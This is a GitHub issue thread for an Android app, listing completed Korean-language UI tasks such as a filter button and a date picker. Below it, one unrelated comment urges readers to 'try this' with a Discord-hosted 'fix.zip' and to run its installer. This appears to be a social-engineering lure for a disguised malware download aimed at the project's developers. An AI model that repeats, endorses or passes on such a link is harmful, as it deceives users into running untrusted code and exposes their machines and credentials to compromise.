### ISSUE TITLE
[UI] 온보딩 / UI 수정

### ISSUE THREAD

**Issue by leeeyubin** [teamterning/Terning-Android#218]
## 🚩 TO DO
- [x] 필터링 설정 버튼 수정
- [x] 데이트 피커 수정
- [x] 파일 위치 이동
- [x] 데이터 관련 파일 만들기

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
